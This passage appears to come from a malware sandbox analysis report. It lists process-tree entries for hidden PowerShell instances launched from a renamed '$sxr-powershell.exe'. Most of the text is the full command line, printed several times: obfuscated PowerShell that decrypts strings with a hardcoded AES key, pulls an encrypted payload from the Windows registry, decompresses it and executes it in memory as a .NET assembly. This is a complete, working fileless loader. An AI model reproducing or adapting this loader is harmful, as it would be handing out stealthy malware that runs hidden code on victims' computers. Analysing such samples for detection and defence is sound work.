[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        35⤵
        
        PID:7200
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7840" "3268" "3188" "3272" "0" "0" "3276" "0" "0" "0" "0" "0"
        35⤵
        
        PID:9736
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3076).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        33⤵
        
        PID:10112
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3076).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        33⤵
        
        PID:8780
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3076).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = 